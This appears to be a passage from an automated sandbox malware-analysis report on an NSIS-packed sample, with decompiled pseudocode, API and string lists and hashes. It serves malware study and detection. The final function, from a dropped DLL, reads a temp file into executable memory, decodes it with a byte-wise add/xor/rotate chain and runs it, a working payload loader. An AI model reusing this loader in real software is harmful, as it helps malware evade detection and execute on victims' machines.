				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\Users\\hardz\\Desktop\\SviRsoKz6E.exe";
				 *0x424730 = _t43 + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\hardz\\Desktop\\SviRsoKz6E.exe", 0x400);
				_t89 = E00405C5A(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\Users\\hardz\\Desktop";
				E004060C1("C:\\Users\\hardz\\Desktop", _t91);
				E004060C1(0x42c000, E00405AA0(_t92));
				_t50 = GetFileSize(_t89, 0);
				 *0x41f8e4 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402E3D(1);
					if( *0x424738 == _t82) {
						goto L29;
					}
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						E004032CA( *0x424738 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E004030D8(); // executed
						if(_t57 == _v24) {
							 *0x424734 = _t94;
							 *0x42473c =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x424740 =  *0x424740 + 1;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405C15(0x424760, _t94 + 4, 0x40);
							return 0;
						}
						goto L29;
					}
					E004032CA( *0x4138d8);
					if(E004032B4( &_a4, 4) == 0 || _v12 != _a4) {
						goto L29;
					} else {
						goto L28;
					}
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x424738) & 0x00007e00) + 0x200;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						if(E004032B4(0x40b8d8, _t90) == 0) {
							E00402E3D(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x424738 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E00402E3D(0);
							}
							goto L20;
						}
						E00405C15( &_v44, 0x40b8d8, 0x1c);
						_t77 = _v44;
						if((_t77 & 0xfffffff0) == 0 && _v40 == 0xdeadbeef && _v28 == 0x74736e49 && _v32 == 0x74666f73 && _v36 == 0x6c6c754e) {
							_a4 = _a4 | _t77;
							_t87 =  *0x4138d8; // 0x62e00
							 *0x4247e0 =  *0x4247e0 | _a4 & 0x00000002;
							_t80 = _v20;
							 *0x424738 = _t87;
							if(_t80 > _t93) {
								goto L29;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v8 = _v8 + 1;
								_t24 = _t80 - 4; // 0x40a194
								_t93 = _t24;
								if(_t90 > _t93) {
									_t90 = _t93;
								}
								goto L20;
							} else {
								break;
							}
						}
						L20:
						if(_t93 <  *0x41f8e4) {
							_v12 = E00406581(_v12, 0x40b8d8, _t90);
						}
						 *0x4138d8 =  *0x4138d8 + _t90;
						_t93 = _t93 - _t90;
					} while (_t93 != 0);
					_t82 = 0;
					goto L24;
				}
			}





























                  0x00402ea9
                  0x00402eac
                  0x00402eaf
                  0x00402eb2
                  0x00402eb8
                  0x00402ec9
                  0x00402ece
                  0x00402ee1
                  0x00402ee6
                  0x00402ee9
                  0x00402eef
                  0x00000000
                  0x00402ef1
                  0x00402efc
                  0x00402f02
                  0x00402f13
                  0x00402f1a
                  0x00402f22
                  0x00402f27
                  0x00402f29
                  0x00403014
                  0x00403016
                  0x00403022
                  0x00000000
                  0x00000000
                  0x00403027
                  0x0040304b
                  0x00403050
                  0x00403056
                  0x00403061
                  0x00403066
                  0x00403069
                  0x0040306a
                  0x0040306b
                  0x0040306d
                  0x00403075
                  0x0040308c
                  0x00403094
                  0x00403099
                  0x0040309b
                  0x0040309b
                  0x004030a3
                  0x004030a3
                  0x004030a6
                  0x004030a7
                  0x004030a7
                  0x004030aa
                  0x004030ac
                  0x004030ac
                  0x004030b6
                  0x004030bc
                  0x004030ca
                  0x00000000
                  0x004030cf
                  0x00000000
                  0x00403075
                  0x0040302f
                  0x00403041
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00402f2f
                  0x00402f34
                  0x00402f39
                  0x00402f3d
                  0x00402f44
                  0x00402f4b
                  0x00402f4d
                  0x00402f4d
                  0x00402f58
                  0x00403080
                  0x00403077
                  0x00000000
                  0x00403077
                  0x00402f65
                  0x00402fe5
                  0x00402fe9
                  0x00402fee
                  0x00000000
                  0x00402fe5
                  0x00402f6e
                  0x00402f73
                  0x00402f7b
                  0x00402fa1
                  0x00402fa7
                  0x00402fb0
                  0x00402fb6
                  0x00402fbb
                  0x00402fc1
                  0x00000000
                  0x00000000
                  0x00402fcb
                  0x00402fd3
                  0x00402fd6
                  0x00402fd6
                  0x00402fdb
                  0x00402fdd
                  0x00402fdd
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00402fcb
                  0x00402fef
                  0x00402ff5
                  0x00403001
                  0x00403001
                  0x00403004
                  0x0040300a
                  0x0040300a
                  0x00403012
                  0x00000000
                  0x00403012

                  APIs
                  • GetTickCount.KERNEL32 ref: 00402EB2
                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\SviRsoKz6E.exe,00000400), ref: 00402ECE
                    • Part of subcall function 00405C5A: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\SviRsoKz6E.exe,80000000,00000003), ref: 00405C5E
                    • Part of subcall function 00405C5A: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C80
                  • GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SviRsoKz6E.exe,C:\Users\user\Desktop\SviRsoKz6E.exe,80000000,00000003), ref: 00402F1A
                  • GlobalAlloc.KERNELBASE(00000040,00000020), ref: 00403050
                  Strings
                  • Error launching installer, xrefs: 00402EF1
                  • "C:\Users\user\Desktop\SviRsoKz6E.exe" , xrefs: 00402EA1
                  • C:\Users\user\Desktop, xrefs: 00402EFC, 00402F01, 00402F07
                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00403077
                  • Inst, xrefs: 00402F86
                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00402EA8
                  • C:\Users\user\Desktop\SviRsoKz6E.exe, xrefs: 00402EB8, 00402EC7, 00402EDB, 00402EFB
                  • soft, xrefs: 00402F8F
                  • Null, xrefs: 00402F98
                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                  • String ID: "C:\Users\user\Desktop\SviRsoKz6E.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SviRsoKz6E.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                  • API String ID: 2803837635-3059790129
                  • Opcode ID: 1fdbf8666ac545bea4b4f259f72344d0a52c8dbd42631ed96dcafa73090d8d3a
                  • Instruction ID: 301210c85c1c672c97290be40cd2ab013445f980247fce5a821d6afddb5369d2
                  • Opcode Fuzzy Hash: 1fdbf8666ac545bea4b4f259f72344d0a52c8dbd42631ed96dcafa73090d8d3a
                  • Instruction Fuzzy Hash: 8851C171A01204ABDF20AF65DD85BAE7FB8EB40369F11413BF504B22D5C7789E818B9D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004030D8, Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 155COMMON
                  Download Yara Rule
                  C-Code - Quality: 94%
                  			E004030D8(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				long _v16;
				intOrPtr _v20;
				char _v84;
				void* _t59;
				void* _t61;
				intOrPtr _t69;
				long _t70;
				void* _t71;
				intOrPtr _t81;
				intOrPtr _t86;
				long _t89;
				signed int _t90;
				int _t91;
				int _t92;
				intOrPtr _t93;
				void* _t94;
				void* _t95;

				_t90 = _a16;
				_t86 = _a12;
				_v12 = _t90;
				if(_t86 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_t81 = _t86;
				if(_t86 == 0) {
					_t81 = 0x4178e0;
				}
				_t56 = _a4;
				if(_a4 >= 0) {
					E004032CA( *0x424798 + _t56);
				}
				if(E004032B4( &_a16, 4) == 0) {
					L33:
					_push(0xfffffffd);
					goto L34;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t86 == 0) {
							while(_a16 > 0) {
								_t91 = _v12;
								if(_a16 < _t91) {
									_t91 = _a16;
								}
								if(E004032B4(0x4138e0, _t91) == 0) {
									goto L33;
								} else {
									_t61 = E00405D01(_a8, 0x4138e0, _t91); // executed
									if(_t61 == 0) {
										L28:
										_push(0xfffffffe);
										L34:
										_pop(_t59);
										return _t59;
									}
									_v8 = _v8 + _t91;
									_a16 = _a16 - _t91;
									continue;
								}
							}
							L43:
							return _v8;
						}
						if(_a16 < _t90) {
							_t90 = _a16;
						}
						if(E004032B4(_t86, _t90) != 0) {
							_v8 = _t90;
							goto L43;
						} else {
							goto L33;
						}
					}
					_v16 = GetTickCount();
					E004065EF(0x40b850);
					_t13 =  &_a16;
					 *_t13 = _a16 & 0x7fffffff;
					_a4 = _a16;
					if( *_t13 <= 0) {
						goto L43;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t92 = 0x4000;
						if(_a16 < 0x4000) {
							_t92 = _a16;
						}
						if(E004032B4(0x4138e0, _t92) == 0) {
							goto L33;
						}
						_a16 = _a16 - _t92;
						 *0x40b868 = 0x4138e0;
						 *0x40b86c = _t92;
						while(1) {
							 *0x40b870 = _t81;
							 *0x40b874 = _v12; // executed
							_t69 = E0040660F(0x40b850); // executed
							_v20 = _t69;
							if(_t69 < 0) {
								break;
							}
							_t93 =  *0x40b870; // 0x4178e0
							_t94 = _t93 - _t81;
							_t70 = GetTickCount();
							_t89 = _t70;
							if(( *0x4247f4 & 0x00000001) != 0 && (_t70 - _v16 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v84, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t95 = _t95 + 0xc;
								E004051E8(0,  &_v84);
								_v16 = _t89;
							}
							if(_t94 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L43;
							} else {
								if(_a12 != 0) {
									_v8 = _v8 + _t94;
									_v12 = _v12 - _t94;
									_t81 =  *0x40b870; // 0x4178e0
									L23:
									if(_v20 != 1) {
										continue;
									}
									goto L43;
								}
								_t71 = E00405D01(_a8, _t81, _t94); // executed
								if(_t71 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t94;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L34;
					}
					goto L33;
				}
			}






















                  0x004030e0
                  0x004030e4
                  0x004030e7
                  0x004030ec
                  0x004030ee
                  0x004030ee
                  0x004030f5
                  0x004030f9
                  0x004030fd
                  0x004030ff
                  0x004030ff
                  0x00403104
                  0x00403109
                  0x00403114
                  0x00403114
                  0x00403126
                  0x0040326b
                  0x0040326b
                  0x00000000
                  0x0040312c
                  0x00403130
                  0x00403256
                  0x0040329f
                  0x00403270
                  0x00403276
                  0x00403278
                  0x00403278
                  0x00403289
                  0x00000000
                  0x0040328b
                  0x00403290
                  0x00403297
                  0x00403250
                  0x00403250
                  0x0040326d
                  0x0040326d
                  0x00000000
                  0x0040326d
                  0x00403299
                  0x0040329c
                  0x00000000
                  0x0040329c
                  0x00403289
                  0x004032aa
                  0x00000000
                  0x004032aa
                  0x0040325b
                  0x0040325d
                  0x0040325d
                  0x00403269
                  0x004032a7
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00403269
                  0x00403141
                  0x00403144
                  0x00403149
                  0x00403149
                  0x00403153
                  0x00403156
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040315c
                  0x0040315c
                  0x0040315c
                  0x00403164
                  0x00403166
                  0x00403166
                  0x00403177
                  0x00000000
                  0x00000000
                  0x0040317d
                  0x00403180
                  0x00403186
                  0x0040318c
                  0x00403194
                  0x0040319a
                  0x0040319f
                  0x004031a6
                  0x004031a9
                  0x00000000
                  0x00000000
                  0x004031af
                  0x004031b5
                  0x004031b7
                  0x004031c4
                  0x004031c6
                  0x004031f4
                  0x004031fa
                  0x00403203
                  0x00403208
                  0x00403208
                  0x0040320d
                  0x00403244
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040320f
                  0x00403213
                  0x00403228
                  0x0040322b
                  0x0040322e
                  0x00403234
                  0x00403238
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040323e
                  0x0040321a
                  0x00403221
                  0x00000000
                  0x00000000
                  0x00403223
                  0x00000000
                  0x00403223
                  0x0040320d
                  0x0040324c
                  0x00000000
                  0x0040324c
                  0x00000000
                  0x0040315c

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: CountTick$wsprintf
                  • String ID: ... %d%%$8A$8A$xA$xA
                  • API String ID: 551687249-266981132
                  • Opcode ID: 2779a8c27ab4fa154f89a57db0462927349ddc59ff22a4c54c6aa2d2765dcfd2
                  • Instruction ID: 5859ff30484dbc6f12110d744d50748fce684291dc682ebadfc23bb097a10b04
                  • Opcode Fuzzy Hash: 2779a8c27ab4fa154f89a57db0462927349ddc59ff22a4c54c6aa2d2765dcfd2
                  • Instruction Fuzzy Hash: BA515E71900219ABCB10AF66D944A9F7BACEF44756F1481BFE810B72D1C738CA41CBAD
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00401759, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147stringtimeCOMMON
                  Download Yara Rule
                  C-Code - Quality: 75%
                  			E00401759(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				CHAR* _t83;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402BCE(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E00405AC6(_t82);
				_push(_t82);
				_t83 = "Mfkeoxlzmclr";
				if(_t33 == 0) {
					lstrcatA(E00405A59(E004060C1(_t83, "C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
				} else {
					E004060C1();
				}
				E0040639C(_t83);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00406435(_t83);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405C35(_t83);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E00405C5A(_t83, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0xc) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E004051E8(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x4247c8 =  *0x4247c8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x4247c8;
						goto L32;
					} else {
						E004060C1(0x40ac08, 0x425000);
						E004060C1(0x425000, _t83);
						E00406154(_t75, 0x40ac08, _t83, "C:\Users\hardz\AppData\Local\Temp\nst2F82.tmp\tkmg9lz0c84fk1.dll",  *((intOrPtr*)(_t85 - 0x14)));
						E004060C1(0x425000, 0x40ac08);
						_t62 = E004057DD("C:\Users\hardz\AppData\Local\Temp\nst2F82.tmp\tkmg9lz0c84fk1.dll",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x4247c8 =  &( *0x4247c8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(_t83);
								_push(0xfffffffa);
								E004051E8();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E004051E8(0xffffffea,  *(_t85 - 8));
				 *0x4247f4 =  *0x4247f4 + 1;
				_t43 = E004030D8( *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 0xc), _t75, _t75); // executed
				 *0x4247f4 =  *0x4247f4 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0xc)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00406154(_t75, _t80, _t83, _t83, 0xffffffee);
					} else {
						E00406154(_t75, _t80, _t83, _t83, 0xffffffe9);
						lstrcatA(_t83,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(_t83);
					E004057DD();
					goto L29;
				}
				goto L33;
			}

















                  0x00401759
                  0x00401760
                  0x00401769
                  0x0040176c
                  0x0040176f
                  0x00401774
                  0x00401775
                  0x0040177c
                  0x00401798
                  0x0040177e
                  0x0040177f
                  0x0040177f
                  0x0040179e
                  0x004017a8
                  0x004017a8
                  0x004017ac
                  0x004017af
                  0x004017b4
                  0x004017b6
                  0x004017b8
                  0x004017bd
                  0x004017bd
                  0x004017c8
                  0x004017c8
                  0x004017d9
                  0x004017db
                  0x004017db
                  0x004017dc
                  0x004017dc
                  0x004017df
                  0x004017e2
                  0x004017e5
                  0x004017e5
                  0x004017ec
                  0x004017fb
                  0x00401800
                  0x00401803
                  0x00401806
                  0x00000000
                  0x00000000
                  0x00401808
                  0x0040180b
                  0x00401865
                  0x0040186a
                  0x004015b0
                  0x004027bf
                  0x004027bf
                  0x00402a5a
                  0x00402a5d
                  0x00402a5d
                  0x00000000
                  0x0040180d
                  0x00401813
                  0x0040181e
                  0x0040182b
                  0x00401836
                  0x0040184c
                  0x0040184c
                  0x0040184f
                  0x00000000
                  0x00401855
                  0x00401855
                  0x00401856
                  0x00401873
                  0x00402a63
                  0x00402a63
                  0x00402a63
                  0x00401858
                  0x00401858
                  0x00401859
                  0x00401492
                  0x00402387
                  0x00402387
                  0x00402387
                  0x00401856
                  0x0040184f
                  0x00402a65
                  0x00402a69
                  0x00402a69
                  0x00401883
                  0x00401888
                  0x00401896
                  0x0040189b
                  0x004018a1
                  0x004018a5
                  0x004018a7
                  0x004018af
                  0x004018bb
                  0x004018a9
                  0x004018a9
                  0x004018ad
                  0x00000000
                  0x00000000
                  0x004018ad
                  0x004018c4
                  0x004018ca
                  0x004018cc
                  0x00000000
                  0x004018d2
                  0x004018d2
                  0x004018d5
                  0x004018ed
                  0x004018d7
                  0x004018da
                  0x004018e3
                  0x004018e3
                  0x004018f2
                  0x004018f7
                  0x00402382
                  0x00000000
                  0x00402382
                  0x00000000

                  APIs
                  • lstrcatA.KERNEL32(00000000,00000000,Mfkeoxlzmclr,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401798
                  • CompareFileTime.KERNEL32(-00000014,?,Mfkeoxlzmclr,Mfkeoxlzmclr,00000000,00000000,Mfkeoxlzmclr,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017C2
                    • Part of subcall function 004060C1: lstrcpynA.KERNEL32(?,?,00000400,004033E4,00423F20,NSIS Error,?,00000007,00000009,0000000B), ref: 004060CE
                    • Part of subcall function 004051E8: lstrlenA.KERNEL32(00420508,00000000,004178E0,00000000,?,?,?,?,?,?,?,?,?,00403208,00000000,?), ref: 00405221
                    • Part of subcall function 004051E8: lstrlenA.KERNEL32(00403208,00420508,00000000,004178E0,00000000,?,?,?,?,?,?,?,?,?,00403208,00000000), ref: 00405231
                    • Part of subcall function 004051E8: lstrcatA.KERNEL32(00420508,00403208,00403208,00420508,00000000,004178E0,00000000), ref: 00405244
                    • Part of subcall function 004051E8: SetWindowTextA.USER32(00420508,00420508), ref: 00405256
                    • Part of subcall function 004051E8: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040527C
                    • Part of subcall function 004051E8: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405296
                    • Part of subcall function 004051E8: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052A4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                  • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nst2F82.tmp\tkmg9lz0c84fk1.dll$Mfkeoxlzmclr
                  • API String ID: 1941528284-2265367138
                  • Opcode ID: 1413912204f72f8cb147cece884a2b3b0500c8f5e8f820d1f5a5e3a000fbe892
                  • Instruction ID: ad8319ac8819e3f4f0647767249a41d8ee4e375b3a8deda6b30fbb54af0d7a5d
                  • Opcode Fuzzy Hash: 1413912204f72f8cb147cece884a2b3b0500c8f5e8f820d1f5a5e3a000fbe892
                  • Instruction Fuzzy Hash: D641B731900515BACF10BFA5CC45DAF3669EF45369B21423BF422B21E1CA7C8A528A6D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A80705, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON
                  Download Yara Rule
                  APIs
                  • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 00A80807
                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 00A809D4
                  Memory Dump Source
                  • Source File: 00000000.00000002.200598798.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: false
                  Similarity
                  • API ID: CreateFileFreeVirtual
                  • String ID:
                  • API String ID: 204039940-0
                  • Opcode ID: 76504572a067cbdf6af8869afde0a7692b4879dcc87363c38b02bf9f938458e5
                  • Instruction ID: f14c5536e5c88c7378cb54cfa7e9ca8434d77e7e4ce793c2ebed087917bd7ac8
                  • Opcode Fuzzy Hash: 76504572a067cbdf6af8869afde0a7692b4879dcc87363c38b02bf9f938458e5
                  • Instruction Fuzzy Hash: 96A1EF31E00209EFEF50EFE4C989FADBBB1BF08315F20845AE515BA2A1D3745A94DB54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 10001140, Relevance: 10.6, APIs: 7, Instructions: 139filestringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 80%
                  			E10001140() {
				signed int _v5;
				signed int _v12;
				void* _v16;
				long _v20;
				long _v24;
				short _v544;
				long _t67;
				void* _t69;
				long _t71;
				void* _t72;
				int _t74;
				void* _t77;

				_v12 = 0;
				_v24 = 0;
				E10001000();
				_t67 = GetTempPathW(0x103,  &_v544);
				if(_t67 != 0) {
					lstrcatW( &_v544, 0x10003000);
					_t69 = CreateFileW( &_v544, 0x80000000, 7, 0, 3, 0x80, 0); // executed
					_v16 = _t69;
					if(_v16 != 0xffffffff) {
						_t71 = GetFileSize(_v16, 0);
						_v20 = _t71;
						if(_v20 != 0xffffffff) {
							_t72 = VirtualAlloc(0, _v20, 0x3000, 0x40); // executed
							 *0x10003024 = _t72;
							if( *0x10003024 != 0) {
								_t74 = ReadFile(_v16,  *0x10003024, _v20,  &_v24, 0); // executed
								if(_t74 != 0) {
									FindCloseChangeNotification(_v16); // executed
									_v12 = 0;
									while(_v12 < _v24) {
										_v5 =  *((intOrPtr*)( *0x10003024 + _v12));
										_v5 = (_v5 & 0x000000ff) + 0x1d;
										_v5 =  ~(_v5 & 0x000000ff);
										_v5 = _v5 & 0x000000ff ^ 0x0000007e;
										_v5 = (_v5 & 0x000000ff) + 0x57;
										_v5 =  ~(_v5 & 0x000000ff);
										_v5 = (_v5 & 0x000000ff) + 0xef;
										_v5 =  ~(_v5 & 0x000000ff);
										_v5 = (_v5 & 0x000000ff) + 0x34;
										_v5 = _v5 & 0x000000ff ^ 0x00000082;
										_v5 = (_v5 & 0x000000ff) + _v12;
										_v5 =  !(_v5 & 0x000000ff);
										_v5 = (_v5 & 0x000000ff) - _v12;
										_v5 = (_v5 & 0x000000ff) >> 0x00000006 | (_v5 & 0x000000ff) << 0x00000002;
										_v5 =  !(_v5 & 0x000000ff);
										_v5 = (_v5 & 0x000000ff) + _v12;
										_v5 = _v5 & 0x000000ff ^ _v12;
										_v5 = (_v5 & 0x000000ff) + _v12;
										 *((char*)( *0x10003024 + _v12)) = _v5;
										_v12 = _v12 + 1;
									}
									_t77 =  *0x10003024(); // executed
									return _t77;
								}
								return _t74;
							}
							return _t72;
						}
						return _t71;
					}
					return _t69;
				}
				return _t67;
			}















                  0x10001149
                  0x10001150
                  0x10001157
                  0x10001168
                  0x10001170
                  0x10001183
                  0x100011a2
                  0x100011a8
                  0x100011af
                  0x100011bc
                  0x100011c2
                  0x100011c9
                  0x100011dd
                  0x100011e3
                  0x100011ef
                  0x1000120b
                  0x10001213
                  0x1000121e
                  0x10001224
                  0x10001236
                  0x1000124c
                  0x10001256
                  0x1000125f
                  0x10001269
                  0x10001273
                  0x1000127c
                  0x10001289
                  0x10001292
                  0x1000129c
                  0x100012a9
                  0x100012b3
                  0x100012bc
                  0x100012c6
                  0x100012d9
                  0x100012e2
                  0x100012ec
                  0x100012f6
                  0x10001300
                  0x1000130f
                  0x10001233
                  0x10001233
                  0x10001316
                  0x00000000
                  0x10001316
                  0x00000000
                  0x10001213
                  0x00000000
                  0x100011ef
                  0x00000000
                  0x100011c9
                  0x00000000
                  0x100011af
                  0x00000000

                  APIs
                  • GetTempPathW.KERNEL32(00000103,?), ref: 10001168
                  • lstrcatW.KERNEL32(?,10003000), ref: 10001183
                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 100011A2
                  Memory Dump Source
                  • Source File: 00000000.00000002.201582078.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.201576255.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.201585410.0000000010002000.00000002.00020000.sdmp Download File
